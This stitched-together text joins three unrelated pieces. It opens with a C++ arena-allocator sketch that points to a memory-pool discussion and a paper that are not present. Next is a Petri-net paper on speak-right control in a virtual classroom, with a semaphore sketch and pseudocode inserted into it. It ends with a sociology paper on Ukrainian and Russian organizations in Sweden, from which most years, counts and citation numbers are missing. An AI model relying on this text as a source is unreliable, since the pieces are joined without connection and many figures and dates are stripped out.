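To round off the memory-pool discussion, here is a sketch of the allocate-not-free idea evaluated in the last test: allocations bump a pointer inside large chunks, individual releases are skipped, and everything is returned in one step, matching the bounded-size query-result scenario. Names, the chunk size, and the 8-byte alignment are assumptions; the paper's StagePool additionally selects the allocation policy through a template parameter, which is omitted here.

#include <cstddef>
#include <vector>

// Allocate-not-free (arena-style) pool: allocations bump a pointer inside a
// large chunk; there is no per-object free, the whole arena is released at once.
class ArenaPool {
public:
    explicit ArenaPool(std::size_t chunkSize = 1 << 20) : chunkSize_(chunkSize) {}
    ~ArenaPool() { releaseAll(); }

    void* allocate(std::size_t size) {
        size = (size + 7) & ~std::size_t(7);               // keep 8-byte alignment
        if (chunks_.empty() || used_ + size > lastCap_) {
            lastCap_ = size > chunkSize_ ? size : chunkSize_;
            chunks_.push_back(new unsigned char[lastCap_]); // grow with a fresh chunk
            used_ = 0;
        }
        void* p = chunks_.back() + used_;
        used_ += size;
        return p;
    }

    void releaseAll() {                                     // single bulk release
        for (unsigned char* c : chunks_) delete[] c;
        chunks_.clear();
        used_ = 0;
    }

private:
    std::size_t chunkSize_;
    std::size_t used_ = 0;
    std::size_t lastCap_ = 0;
    std::vector<unsigned char*> chunks_;
};

int main() {
    ArenaPool arena;                 // e.g. one arena per returned query result
    for (int i = 0; i < 1000; ++i)
        arena.allocate(32);          // many small allocations, no individual free
    arena.releaseAll();              // everything handed back in one step
    return 0;
}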
authorbrief liu ping-ping( -), female, associate professor, xi’an technological university, research area: artificial intelligence international journal of advanced network monitoring and controls volume , no. , research of virtual network classroom collaborative mechanism based on petri net shengquan yang , shujuan huang school of computer science and engineering xi’an technological university, xi’an, china email: xaitysq@ .com; shujuanhuang@ .com abstract. in order to keep multi-role communication action of virtual network classroom orderly and correctly at the same time, this paper proposes and studies its communication collaborative relationship based on petri net. firstly, it introduces the basic theory and the system state change graph of the roles in virtual classroom, and discusses in detail the collaborative relationship between students and teacher in network environment. especially by taking advantage of petri net tool, this paper in virtue of formalized method describes and analyzes collaborative relationship and collaborative mechanism between teacher and students, which exists in the virtual classroom. finally, the collaborative mechanism has been realized successfully with the theory about process control concurrence view. keywords: virtual classroom, collaborative mechanism, petri net, process control . introduction the remote distance learning is a new generation educational pattern which is produced by the combination between computer network and the multimedia technologies today. it uses modern network and information technology to overcome geographic limitations of space, so that teachers, students can complete learning activities in different places. the modern distance learning is one kind of new education form which produces along with the present development of information technology, which is a principal means to construct people lifelong to study mode during the era of knowledge economy. in distance learning interactive system, although teachers and students living in different places, but it feels like in a classroom, in which the teachers and students can see each other and be able to hear mutually. but because all activities are carry on under the network environment, the teacher is the teaching activity main body, he must have lots of qualifications such as that he can control the student to join, to make the student withdraw, to ask questions to students, and can cause the student to obtain the right to speak, and can cancel the student to speak jurisdictions and so on. the students may ask questions to the teacher at any time. that is, in the entire teaching activities, each kind of activity which will occur will be concurrent, indefinite, and stochastic, therefore a collaborative mechanism must be studied successfully in order to suit the above characteristic, what’s more to maintain the orderliness of the whole teaching and learning activities. international journal of advanced network monitoring and controls volume , no. , . the cooperative relationship of virtual classroom virtual classroom is the local area network (lan) or wide area network (wan) space to create a virtual reality, interactive teaching and learning environment in order to achieve a variety of traditional classroom teaching function, which can provide a shared collaborative classroom learning environment for a geographically dispersed network of online teachers and students to so that it can be a variety of real-time communication and collaboration [ ]. 
in the virtual classroom, teacher and the students are acting with the traditional teaching in the same role, but in realizes specifically has the essential difference. this kind of difference mainly displays in the virtual classroom teaching process, because in the long- distance teaching the teacher and the student usually are in the different place, the overwhelming majority students in the network region also possibly are scattered, which causes each kind of concurrent activity becomes very complex. in order to accurately describe the synergy between teaching and learning activities, specific states which exist in teacher and students must be narrated clearly and concretely. (b) student in seven states figure. the states graph of teacher and student in virtual network classroom in teaching activities, there are two kinds of the teacher’s states (see figure -a): speak (teaching lectures) and listen to students speak, however student’s states (see figure -b) are: listen, speak, pause to speak, continue to speak, be cancelled speeches, be cancelled attendance, allow to speak and listen, a total of seven states. according to the changed states of teacher and student in figure , their collaborative relationships are described below : in the entire teaching process, there is only a speaker allowed, which either is the teacher, either is the student; at any time each role is played in between speaking and listening state, and what’s more their roles are transformed uncertainly in the two states. when the teacher is at the speech condition, the student listens, when the teacher asks questions or one student applies for speech and obtains the right research of virtual network classroom collaborative mechanism based on petri net to speak, this student starts to speak, but the teacher listens at the time; in order to control the entire ordering process of teaching students, the state change of students must be under the control of teachers, while teacher have rights to cancel the students to speak, to enable students to continue, abolish the “unpopular or unwelcome” students to speak, allowing students to listen and so on. in the network environment, all kinds of states in teaching will be a variety of unpredictable changes in concurrent operation, of which the appearance have many properties such as randomness, uncertainty and instability, etc. for example, students may ask questions at any time, a number of students to apply to speak, where there must be change between listen and speak, teachers and students how to coordinate and so on, it is necessary to control a variety of concurrent activities of a cooperative mechanism. . petri net model of cooperative relations coordination mechanism among the virtual classroom is a typical computer supported collaborative work of the problem, which is abbreviated as cscw. the so-called computer supported collaborative work that is more than one member of a group existed in some distributed network systems use multiple computers to work together to accomplish a task. because of this thinking is reflected in the information age groups, the way people work, interactive, distributed and collaborative nature of the objective requirements, it gives full play to the computer network as a potential communications media and superiority, which is being increasingly widely appreciated. that, computer supported cooperative work applied to the teaching field, is known as computer supported collaborative learning, abbreviated as cscl. 
Petri nets are a useful graphical modeling tool with composable models and particular strengths for describing and analyzing concurrent phenomena. A Petri net is also a well and strictly defined mathematical object; through the mathematical development of Petri net analysis methods and techniques it supports not only static structural analysis but also dynamic behavioral analysis [ ] [ ].

Establish the Petri Net Model

Definition 1: A triple N = (S, T; F) is called a net if and only if (1) S ∩ T = ∅, (2) F ⊆ (S × T) ∪ (T × S), and (3) dom(F) ∪ cod(F) = S ∪ T. For x ∈ S ∪ T, the sets ˙x = { y | (y, x) ∈ F } and x˙ = { y | (x, y) ∈ F } are called the pre-set and post-set of x.

Definition 2: A quadruple PN = (P, T, F, M) is called a Petri net if and only if:
1) N = (P, T; F) is a net;
2) M: P → Z (the set of non-negative integers) is the marking function, where M is the initial marking (that is, the initial state);
3) Firing rule: a transition t ∈ T is said to be enabled under marking M if and only if M(s) ≥ 1 for every s ∈ ˙t; firing an enabled transition t changes the state, and the successor marking M' is obtained after the firing.

A Petri net consists of four kinds of elements: places (P), drawn as circles "○"; transitions (T), drawn as bars "—"; directed arcs connecting places and transitions; and tokens inside places, drawn as "●". Places describe the logical states of the system, and transitions describe the actions and the occurrence of events. The input function (I) and the output function (O) express the adjacency relations between places and transitions. If a place is given a mark k (k a non-negative integer), the place holds k tokens and is said to be marked; a marked Petri net can therefore be written as a quintuple PN = (P, T, I, O, M), where M is the set of state markings of the net.

The collaborative mechanism of the virtual network classroom can be described as a Petri net, as shown in the figure.

[Figure: Petri net model of the collaborative mechanism of the virtual network classroom.]

The concrete meaning of the model elements is given in the table below. The place set is P = {p1, p2, p3, p4, p5, p6} and the transition set is T = {t1, t2, t3, t4, t5}; the token count ω = n + 1 in the listening place represents the n students plus the teacher, and the token ● in the idle-resource place indicates that one speak-right resource is available.

Table: Concrete meaning of the Petri net model elements

Place   State or behavior
p1      The teacher or a student is in the listening state
p2      Executing the task of applying for the speak-right resource
p3      Holding the speak right; the speak task can be executed
p4      The student is forbidden to listen to the teaching
p5      The speak-right resource is idle
p6      The speak-right resource is in use

Transition   Command or event
t1           Send the command to apply to speak
t2           Send the command to apply to speak
t3           Send the command to release the speak-right resource
t4           Send the command to cancel a student's listening
t5           Send the command to allow a student's listening

Analysis of the Petri Net Model of the Collaborative Mechanism

The figure depicts the initial state of the system, in which the teacher's and students' tokens are all in the listening place. The teacher's workflow is as follows:

1) When the teacher wants to teach, the teacher applies to the system for the speak right; the corresponding transition fires and the teacher's token flows from the listening place to the applying place, indicating that the teacher wants to obtain the speak right from the system. If at this moment a student x is in the speaking place, step (2) is entered; otherwise the flow changes over to step (3).
2) The teacher has the highest priority in the system. If at this moment a student x is in the speaking place, that is, student x is speaking, the system sends an event forcing student x to release the speak right unconditionally; the corresponding transition fires, student x flows from the speaking place back to the listening place, and at the same time the speak-right resource flows from the in-use place to the idle place, meaning that the speak right changes from busy to idle.

3) Since the speak-right resource is now idle, the system lets the teacher obtain the right to speak first: the corresponding transition fires, the teacher's token flows from the applying place to the speaking place, indicating that the teacher is teaching or commenting, and at the same time the speak-right resource flows from the idle place to the in-use place, indicating that the speak-right resource is no longer available.

4) After the teacher has presented a topic or a section of the course, poses a question, permits a student inquiry, or gives the floor to a student in the waiting queue who had spoken before, the teacher issues the release-speak-right event; the corresponding transition fires, the teacher flows from the speaking place back to the listening place, and at the same time the speak-right resource flows from the in-use place to the idle place, meaning that the speak right changes from busy to idle. The system then enters the next round of competition for the speak-right resource.

The student's workflow is as follows:

1) When a student wants to ask the teacher a question, the student must apply to the system for the speak right; the corresponding transition fires and the student token x flows from the listening place to the applying place, indicating that student x is applying for the right to speak.

2) If at this time the teacher is lecturing or another student is speaking, student x waits in the applying place until the speak right changes from busy to idle, and then step (3) is executed.

3) Since the speak-right resource has been released, the system serves the students waiting to speak on a first-in-first-out (FIFO) basis according to their waiting priority. When student x's priority is the highest, the corresponding transition fires, student x's token flows from the applying place to the speaking place, indicating that x is speaking or putting a question to the teacher; at the same time the speak-right resource flows from the idle place to the in-use place, indicating that the speak-right resource is occupied.
4) If student x is putting a question to the teacher, the teacher needs to answer it in the gaps of the student's speech. After student x has spoken, the system issues a suspend-speech event; the corresponding transition fires, student x flows from the speaking place back to the applying place, and the system inserts the student at the first position of the waiting queue for the speak-right resource, meaning that the student has the highest priority among the students waiting to speak; at the same time the speak-right resource flows from the in-use place back to the idle place, so the speak right changes from busy to idle. The teacher now answers the question on the topic in turn; because the teacher's priority is the highest, the teacher does not queue, and as soon as the teacher requests to speak, the system immediately enters the teacher's workflow.

5) If midway the teacher wants to cancel the speech of the current student x, the teacher issues a cancel-current-speaker event, which forces student x to release the speak right unconditionally; the corresponding transition fires, student x flows from the speaking place back to the listening place and returns to the listening state, and at the same time the speak-right resource flows from the in-use place to the idle place, so the speak right changes from busy to idle. The system then enters the next round of competition for the speak-right resource.

6) During listening, if the teacher discovers an "unwelcome" student, the teacher issues a cancel-listening event for that "undesirable" student; the corresponding transition fires, the student flows from the listening place to the forbidden place, and the student is now forbidden to listen to the teaching.

7) When such a student x signals to the teacher a willingness to observe classroom discipline and the teacher permits the student to rejoin, the teacher issues an event admitting student x to listen again; the corresponding transition fires, student x flows from the forbidden place back to the listening place, and the student is again permitted to listen.

Model Analysis of Concurrency and Conflict

According to the Petri net model described for the collaborative mechanism of the virtual classroom, the students and the teacher behave like many processes running stochastically and concurrently inside the system [ ]. Consider, however, the situation in which many students are applying for the speak right at the same time, with marking M = (m, u, 0, 0, 1, 0): m tokens in the listening place, u students in the applying place, nobody speaking or forbidden to listen, and the single speak-right resource idle. If the granting transition t were enabled for v of the students waiting in the applying place, these v tokens would flow into the speaking place, giving

M[t]M' = (m, u - v, v, 0, 1 - v, v),

where Mi[t]Mj expresses that firing (also called igniting) the transition t takes the Petri net from marking Mi to marking Mj. Since there is only one resource token in the idle place, the resulting marking is meaningful only if 1 - v ≥ 0, and therefore v ≤ 1: at any moment only one process can be allowed to obtain the right to speak. The conflicts that arise when processes compete for this critical resource at run time must therefore be resolved; the conflict is in essence a competition [ ].

Solution of the Resource Competition Conflict

The concurrent accesses of multiple processes to the critical resource must be controlled so that the system can operate normally.
This problem can be solved with the aid of the process-dispatching management methods used in operating systems [ ]. A semaphore S (with initial value 1) is introduced, together with a priority flag power and an event flag event. The operations on S are the P operation and the V operation. power and event are defined as follows: power indicates the caller's priority, with one value denoting the teacher's priority and another the students' priority; event distinguishes three cases: cancel the speech, suspend the speech, or no immediate action.

P(S, power, event) is defined as follows:
1) When power denotes the teacher and S ≤ 0 (the speak right is currently held): if event is "cancel the speech", the system strips the currently speaking process of the speak-right resource and returns it to the listening state; if event is "suspend the speech", the system strips the current process of the speak-right resource and immediately inserts it at the head of the blocking queue. If power denotes a student or S > 0, the system proceeds directly to step (2);
2) S = S - 1;
3) if S ≥ 0, the calling process continues to run;
4) if S < 0, the process is blocked and inserted into the blocking queue of semaphore S, and the system reschedules another process to run.

V(S) is defined as follows:
1) S = S + 1;
2) if S > 0, the calling process continues to run;
3) if S ≤ 0, there are blocked processes, so the system must wake up the first blocked process in the queue of semaphore S, move it to the ready queue, and let it continue running.

Implementation of the Collaborative Mechanism

Premise: let the teacher process be ProcessT, which has the highest priority; let the process of student i be ProcessSi, and let all students have the same priority level.

Strategy:
1) When ProcessT is running and applies for the speak-right resource, the system adopts a "deprivation" (preemptive) mode: according to the event type issued by ProcessT, if it cancels the speech of the currently speaking ProcessSi, the system deprives ProcessSi of the speak-right resource and returns it to the listening state; if it suspends the currently speaking ProcessSi, the system takes the speak-right resource away from ProcessSi and inserts ProcessSi at the first position of the students' waiting-to-speak blocking queue.
2) When a ProcessSi is running and applies for the speak-right resource, the system takes a "non-deprivation" (non-preemptive) mode: it waits for the process currently using the speak-right resource to release it, and then, on a first-come-first-served (FIFO) basis, wakes up the process at the head of the students' waiting-to-speak blocking queue and lets it obtain access to the critical resource.

A final remark: while students are in the waiting-to-speak blocking queue, the state of ProcessSi is "listening", which means a student waiting to speak retains the right to listen; this is consistent with an actual classroom.
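As a bridge to the code fragments below, here is a small bookkeeping sketch of the P(S, power, event)/V(S) discipline just described, with the teacher's preemptive path and the students' FIFO queue. There are no real threads here: "blocking" is modeled by placing a process id in the queue, the enum names and the way the stripped speaker's resource is transferred are assumptions, and the counter updates are one plausible reading of the informal definition rather than the authors' exact rules.

#include <deque>
#include <iostream>

enum class Power { Teacher, Student };
enum class Event { None, Suspend, Cancel };

// Bookkeeping sketch of the speak-right discipline: a counter S with initial
// value 1, a FIFO queue of waiting processes, and a teacher preemption path.
class SpeakRightControl {
public:
    // Returns true if pid obtained the speak right, false if it was queued.
    bool P(int pid, Power power, Event event) {
        if (power == Power::Teacher && s <= 0) {
            if (event == Event::Cancel) {
                std::cout << "speaker " << speaker << " returns to listening\n";
            } else if (event == Event::Suspend) {
                waiting.push_front(speaker);  // re-queue the suspended speaker at the head
                --s;                          // it now counts as one more waiter
            }
            speaker = pid;                    // the freed speak right goes to the teacher at once
            return true;
        }
        --s;
        if (s >= 0) { speaker = pid; return true; }
        waiting.push_back(pid);               // resource busy: wait in FIFO order
        return false;
    }

    void V() {
        ++s;
        if (s <= 0 && !waiting.empty()) {     // someone is blocked: wake the first in the queue
            speaker = waiting.front();
            waiting.pop_front();
            std::cout << "speak right granted to " << speaker << "\n";
        }
    }

private:
    int s = 1;                 // semaphore: one speak-right resource
    int speaker = -1;          // id of the process currently holding the right
    std::deque<int> waiting;   // FIFO queue of processes blocked on S
};

int main() {
    SpeakRightControl ctrl;
    ctrl.P(1, Power::Student, Event::None);     // student 1 obtains the speak right
    ctrl.P(2, Power::Student, Event::None);     // student 2 waits (FIFO)
    ctrl.P(0, Power::Teacher, Event::Suspend);  // teacher suspends student 1 and speaks
    ctrl.V();   // teacher releases: student 1 resumes first (head of the queue)
    ctrl.V();   // student 1 releases: student 2 gets its turn
    ctrl.V();   // student 2 releases: the speak right is idle again
    return 0;
}

With this discipline, P(0, Teacher, Suspend) puts the interrupted student back at the head of the queue, so the following V() hands the speak right straight back to that student, matching strategy 1) above.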
Parts of the implementation code are as follows. The teacher process control routine is similar to:

ProcessT_work()
begin
    ......
    P(S, teacher, cancel_or_suspend);  // apply for the speak-right resource,
                                       // or cancel / suspend the currently speaking student
    T process speaks;                  // teaching
    ......
    T process asks a question;         // to the students
    V(S);                              // release the speak-right resource
    ......
end;

Every student process control routine is similar to:

ProcessSi_work(i)
begin
    ......
    Si listens to the teacher's lecture;  // in the listening state
    ......
    P(S, student, none);                  // apply for the speak-right resource
    Si process speaks;                    // the student speaks
    V(S);                                 // release the speak-right resource
    ......
end;

Conclusion

The research on the virtual classroom's collaborative mechanism discussed in this paper decomposes a complex problem into much simpler forms; it is highly versatile and scientifically rigorous, and it provides a sound model and method for other similar research, so it has high practical and reference value. The author has applied this modeling method successfully in the actual development of a distance-learning system for a Chinese university, where it has performed well in operation.

Acknowledgment

The research is supported by the State and Provincial Joint Engineering Laboratory of Advanced Network, Monitoring and Control (financing project no. GSYSJ ).

References

[ ] Yu Huang, Wenhui Hu, Xin Gao, Hart-pin Wang, "WSCI formal model analysis based on Petri nets", Computer Engineering & Science, October.
[ ] Yebai Li, Fuqi Mao, "Research of the verification in workflow process modeling on the application of Petri nets", IC4E, International Conference on, Sanya, January.
[ ] Zouaghi, L.; Wagner, A.; Badreddin, E., "Hybrid, recursive, nested monitoring of control systems using Petri nets and particle filters", Dependable Systems and Networks Workshops (DSN-W), International Conference on, Chicago, August.
[ ] Arpaia, P.; Fiscarelli, L.; La Commara, G.; Romano, F., "A Petri net-based software synchronizer for automatic measurement systems", IEEE Transactions on Instrumentation and Measurement, January.
[ ] Mahgoub H. Hammad, Alsadig Mohammed, Moawia E. Eldow, "Design an electronic system use the audio fingerprint to access virtual classroom using artificial neural networks", Computer, Communications, and Control Technology (I4CT), International Conference on, Kuching, Malaysia, April.
[ ] Ziyue Ma, Yin Tong, Zhiwu Li, Alessandro Giua, "Basis marking representation of Petri net reachability spaces and its application to the reachability problem", IEEE Transactions on Automatic Control, May.

Ukrainian and Russian Organizations in Sweden and the Conflict Back Home

Sofiya Voytiv
Stockholm University, Sweden. E-mail: sofiya.voytiv@sociology.su.se

Abstract

This paper investigates whether the Maidan revolution in Kyiv (late –early ) and the ongoing armed conflict in eastern Ukraine (early ) have been reflected in the collaboration networks of Ukrainian and Russian organizations in Sweden between and . I use ERG models to account for the probabilities of ties between the organizations, depending on the network structure and individual attributes such as ethnic identification and the choice of a side to support in the conflict.
results suggest that it is support for a certain side in the conflict, and not ethnic self-identification, which drives the clustering of the networks during the most violent period. keywords ethnic organizations, collaboration networks, ergm, foci of activity, armed conflict. in order to increase their influence and achieve certain other goals, most organizations tend to collaborate with other organizations that they believe share their perspectives and attitudes (portes et al., ). ethnic organizations mostly base their activities on perceptions of common “routes” and “roots” and tend to collaborate with similar others, and thus have a quite homophilous collaboration network. however, when a violent armed conflict in the homeland arises, it can be brought closer to the everyday space of diaspora through modern media and globalization processes (baser, ; brubaker, ; féron, ; féron and lefort, ; jabri, ; oberschall, ). for example, the development of modern media has allowed a lot of war and conflict-related events to be available and witness-able across the geographical spaces simultaneously (ukrainian revolution at the end of – beginning of has been streamed by multiple channels online; mosul battle streamed online via facebook, and others). a lot of ethnic/diasporic organizations in this context may mobilize their activism in order to show their support for or discontent with the events, especially if they perceive themselves as a group under attack (oberschall, ). for example, féron ( ; féron and lefort, ) discusses the case of conflict-generated diasporas that emerge as a direct response to the armed conflict in the home country. in addition, baser ( ) looks more closely at the realities of turks and kurds living in germany and sweden and compares their experiences, which lead to different outcomes for the relationships between the two groups in these specific contexts. other research on the interconnection of war in the homeland and diasporas include multiple case studies such as palestinian, irish, armenian, tamil, rwandan tutsi diasporas as well as studies of intergroup relations in the country of settlement, e.g., sikh–muslim relations in britain (féron, ; koinova, ; moliner, ; and others). however, this type of research is still quite scarce, while most of the diaspora studies focus mostly on the ways in which diasporas can affect the peace-building processes in their home countries, as well as the political unrest © author. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). issue | vol. ukrainian and russian organizations in sweden and the conflict back home that they can be a part of in the country of settlement (demmers, ; féron, ). nevertheless, all this research, among others, show that an ongoing armed conflict in the home country can have the potential to affect the collaboration networks, which different ethnic organizations build with each other. thus, shared ethnicity can lose its importance in how an organization decides to form a connection with another, and shared attitudes about the conflict can become a leading mechanism in forming collaborations. in other words, an ethnically homophilous collaboration network may reorient itself into clustering by attitudes toward the conflict, and thus actively choose to become homophilious based on that perceived value. 
an organization can, therefore, give a lesser degree of consideration to collaborate with another one solely on the basis of that organization’s claim of ethnic belonging, and choose the collaborations based on the perceived agreement on the politics in the home country. alternatively, there might be a reconfiguration of the meaning of ethnic belonging, namely the attitudes toward the conflict may become a substantial part of identifying the potential collaborator as a “true” co-ethnic or not, and thus leading to the action of working together or rejection of any association. in this paper, i focus on the collaboration networks of ukrainian, russian, and russian-speakers’ organizations in sweden to see the effects that their identified ethnicity and stand toward the conflict may have had on their structure. i account for the swedish context and trace the evolution of the network, including its growth through the creation of the conflict-generated organizations, i.e., organizations that both through their name and activity description claim the war in eastern ukraine to be their main focus, agenda, and reason for existence. i do not claim to see the causal relationship or to distinguish the exact impact of the war on the collaboration networks since i specifically focus on the through period that saw the beginning of war in eastern ukraine and was the most violent period in terms of casualties. however, i suggest that there are some indications that the reflections of war have at least been present in the studied collaboration networks and thus had a significant enough impact, especially in the ukrainian organizations’ case. focusing on this conflict is particularly interesting since it allows us to follow its development from the early stages onwards, as well as follow the changes in the diasporic communities, in the context of the relatively high freedom of organization that sweden provides. i suggest that the concept of homophily is useful to understand ethnic organizations’ collaboration before the armed conflict in eastern ukraine started, but the model of foci of activity is more applicable for the analysis of collaborations based on their attitudes toward the armed conflict. i suggest that engaging in activities that (do not) support a certain side in the conflict might have become a focus of activity for the organizations and reorganized the organizational field along the conflict lines that later became incorporated into the identification of the other organization’s ethnic belonging. thus, ethnicity in terms of similar ideas on one’s “roots and routes” may become less steering for the collaboration decisions than identification with a certain side in the conflict. the context of the study short background on the armed conflict in eastern ukraine the current armed conflict in eastern ukraine can be traced back to the beginning of the maidan revolution in november when the protests against then president yanukovych and the parliament of ukraine became large scale due to the president’s sudden decision not to sign a trade pact with the european union. by late february , there were more than a unarmed protesters that were killed, after which then president yanukovych fled the country and a new parliament was established (un documents for ukraine). 
in march , the russian federation annexed the crimean peninsula, an autonomous region within ukraine, claiming its ethnic belonging as russian and the “necessity of defending the russians in crimea” (address by president of the russian federation vladimir putin). soon thereafter, russian- backed rebels started an insurgency in two eastern regions of ukraine: luhansk and donetsk (the world bank: conflict in ukraine, ; osce statements). the most violent period of the conflict occurred in and . july also saw the downing of the mh flight by russian-backed insurgents in eastern ukraine (crash mh , ). the world bank organization estimates that over million people in eastern ukraine, specifically the donbas region, have been directly affected by the continuing conflict (the world bank: conflict in ukraine, ). according to a ocha report, the number of casualties due to the conflict was , , with , wounded and , killed (ocha, ). by , the number of those killed reached more than , (the world bank: conflict in ukraine, ; un documents for ukraine). in addition to casualties, . million people have been displaced. at the time of this writing, the official ceasefire has often been connections violated, and recent developments in the ukrainian– russian relations (russia seizing three naval ships in the azov sea in late november ) point to a new phase of the crisis (un emergency security council meeting on seized ukrainian vessels). swedish context: response to the conflict  in eastern ukraine and ukrainians and  russians in sweden sweden is a country with a high level of participation in civil society, with an astonishing number of , “civil society” organizations, out of which , are non-profit (statistikmyndigheten scb). it is relatively easy to register an organization if it is non-profit, including even applying for funding through the state. sweden is quite welcoming to different types of non-violent, non-terrorist, ethnic activism, which creates good grounds for practicing one’s ethnicity and taking part in homeland politics through demonstrations and other similar activities (baser, ). in the context of the ukrainian–russian conflict, sweden has been very supportive of ukraine. one example is the multiple visits by the swedish foreign affairs ex-ministers carl bildt (march, ) and margot wallström in . in addition, sweden has been offering humanitarian, financial, technical, and even police training aid to ukraine since the war unraveled, through organizations such as sida and riksbanken (the national bank of sweden) (sveriges riksbank and sida: ukraine). moreover, within its regional strategy for cooperation with eastern europe, launched in november , ukraine is the biggest recipient (european external action service – european commission). in , there were , people born in the russian federation and , born in ukraine living in sweden (statistikmyndigheten scb). according to the swedish migration office, of the people seeking asylum from ukraine during the years of the conflict, only applicants were approved in and just in (migrationsverket, ). thus, it can be assumed that the ukrainian population living in sweden has not been significantly affected by migration due to the armed conflict in eastern ukraine. however, the economic and political situation of ukraine has no doubt influenced the decision-making process of emigration from the country. the history of ukrainian and russian populations’ settlements in sweden is, to a great extent, speculative and mixed. 
throughout the soviet union period, most people coming from any republic within the union would often be counted either as soviet or russian. therefore, it is not easy to describe a clear and distinct history of every population. however, some knowledge has been passed on, both through the official governmental institutions, organizations, and individual people. the information below is based on interviews with the representatives of different russian, russian-speaking and ukrainian organizations, russian and ukrainian embassies, and swedish statistical bureau. when it comes to ukrainians in sweden throughout the twentieth century, one of the first bigger waves came as prisoners of the to winter war between finland and the soviet union as well as more coming during the later years of the second world war. by the mid- s, the community had managed to create some organizations (embassy of ukraine in sweden). another wave of immigration to sweden came with the collapse of the soviet union, and included mostly women. thus, by , there were men and , women born in ukraine living in sweden (statistikmyndigheten scb). this statistics, however, has to be viewed with caution since the registration by country of birth might have been mixed up with accounts of registering soviet union and not a particular soviet republic before the late soviet union collapse. the first big wave of emigration from russia in the twentieth century came with the first world war and the revolution, following thereafter with emigration caused by the second world war and finally, following the break-up of the soviet union. in the early s, the russian population in sweden consisted mostly of women (embassy of the russian federation in the kingdom of sweden). thus, by , there were , men and almost twice as much ( , ) women born in russia living in sweden (statistikmyndigheten scb). ukrainian and russian organizations in sweden also have interconnected, yet, distinct histories of existence in sweden (most of this information is obtained from the interviews with representatives from the ukrainian and russian ethnic organizations). many of these organizations were created before or after the second world war, and some changed from the so-called soviet “friendship” to independent nation-state-specific organizations. most of them claim a very long history of existence even before they were (or formally could be) registered. practicing activism based on cultural issues is rarely problematic in sweden, and organizations that mostly focus on maintaining traditions and celebrations from the home country can easily apply ukrainian and russian organizations in sweden and the conflict back home for funding from the state to organize such activities. on the other hand, to be a completely politically focused organization or one primarily occupied with humanitarian or other aid can be limiting, in terms of funding from the swedish state and require stronger argumentation. this is even more complex for openly political organizations (lagar för ideell förening – bolagsverket). therefore, many organizations may find it easier not to register with the state, although they do exist and organize meetings and events for their members. most of these organizations use online social media platforms, where they can freely converse and diverge from mainstream ideas and thoughts. 
all in all, the swedish context is one with a relatively high freedom of organizational engagement and expression, which makes it quite easy for the diasporic communities to organize and push their agenda, often relating to raising awareness about their homeland or their situation in the country of settlement. therefore, studying the collaboration networks in this context is not limited by the legal or oppressive regime structures in which similar practices cannot take place. here, it is also important to note that diaspora organizations, although often claiming to represent the totality of the group rarely do so (ragazzi, ). most often, diaspora groups are comprised of people who have a very special connection to the idea of “homeland” and stronger ethnic identification than their average co-ethnic. thus, this research cannot be generalized to the total populations of either ukrainians or russians in sweden, but only to very specific diasporic organizations with a strong and institutionalized sense of ethnic belonging. in addition, the research opens an important arena for studies on inter-ethnic and diasporic relations in the times of war in the home country. homophily the idea behind the concept of homophily is often summarized by a saying “birds of a feather flock together,” famously applied by mcpherson et al. ( ) and relates to the phenomenon that people tend to become friends with people who share some similar characteristics with them. homophily is an ambivalent process that makes the flow of information faster for similar others, while at the same time implies that this flow of information is localized and not different from whatever the similar others already share (mcpherson et al., ). mcpherson and smith-lovin ( ) distinguished between choice homophily and induced homophily. in their discussions, induced homophily covers the effect of group composition that is homogenous on the individual pairings with similar others. similarly, blau ( ) proposed that patterns of relationships including homophily are guided by relative group size and ability to gain contacts for in- and out- group. in other words, the opportunity structure within the homogeneous group/organization that a pair is in dictates that the pair is also homogenous. thus, in this view, baseline homophily reflects the composition at large and is affected by the relative size and pool of potential contacts. on the other hand, choice homophily is an individual bias or propensity to connect with similar others (coleman, ; mcpherson and smith-lovin, ; marsden, ). in other words, the composition at large has no effect on the homophily patterns in the group. multiple studies have pointed to how homophily can be stronger or weaker for different types of ties as well as different socio-demographic or behavioral/attitudinal categories within the given context. when it comes to socio-demographic categories, such as sex, gender, age, or ethnicity, studies have been variable. in the case of gender, homophily is especially interesting since the group sizes at large are almost equal. the fact that gender homophily is strongly present in different societies and groups showcases that there is an individual or structural bias, since the organizational foci are gendered, as are workplaces and other activities (mcpherson and smith-lovin, ; eder and hallinan, ). marsden ( ) after controlling for kin showed that network composition of people with whom others discuss important matters is strongly gendered. 
further, ibarra ( ) found that men have stronger sex homophilous ties than women. moreover, women with homophilous ties received support from other women and instrumental access through network ties to men, in her study of an advertising firm (ibarra, ). when it comes to age, homophily patterns depend on the type of ties studied (mcpherson and smith-lovin, ). in addition, since school classes are grouped by age, a strong baseline age homophily is induced (mcpherson et al., ). age homophily has also been shown to persist longer, most probably due to friendships formed at a younger age (mcpherson et al., ; marsden, , ). homophily and ethnicity homophily based on ethnicity is a special case and has been explained by both contact opportunities (group size) and biases. studies have shown that connections smaller ethnicized and racialized groups share more networks with majority groups (blau, ; marsden, ; mcpherson et al., ). on the other hand, other studies (marsden, , among others) have shown that this pattern may be different for certain groups, where a smaller group shows a tendency for homophily despite the baseline expectation that smaller ethnic groups’ networks should include more majority group members. one explanation that these studies give for this anti-intuitive pattern is that some organizational foci are segregated by ethnicity and thus limit opportunities and create bias. often, these overlap with social class and status. in the case of ethnic organizations, the process of defining ethnic belonging and cultural heritage becomes central and practical. these organizations are voluntary, and historically people have joined them in order to gain access to information networks and for work opportunities, among other things (portes et al., ). portes et al. ( ) write that in order to play a role in the nation- state politics on minorities, people often organize in a formal, stronger, way to exercise more power. similarly, ooka and wellman ( ) in their study on ethnic groups in toronto showed that newly arrived migrants tend to have more homophilous networks that can be explained by both ethnic segregation (of neighborhoods, voluntary organizations, language, schools, etc.) and hidden value homophily, like tastes and information. in the context of ethnic organizations, ethnicity is constantly made and maintained through various organized events and similar activities. scott feld’s ( ) foci of activity model is both complementary and explanatory for the analysis. feld suggests a theory of focused social ties based on the idea that social networks are organized through shared focus and joint activity. he states that individuals often have little choice in their association with certain foci. while some activities can be chosen by individuals who then create social networks around them (e.g., playing tennis), social foci can be better understood as social structures that systematically constrain the choices of relationship formations (e.g., only certain people play or want to play tennis). thus, people who are tied to each other through their relations to these focal activities also tend to be homogenous in other characteristics. feld derives three propositions from his model. first, since we meet to associate, most relationships originate in focused activities. second, these foci are usually homogeneous. third, if foci are homogeneous, the ties that are created there also tend to be homogeneous (mcpherson and smith-lovin, ; mcpherson et al., ). 
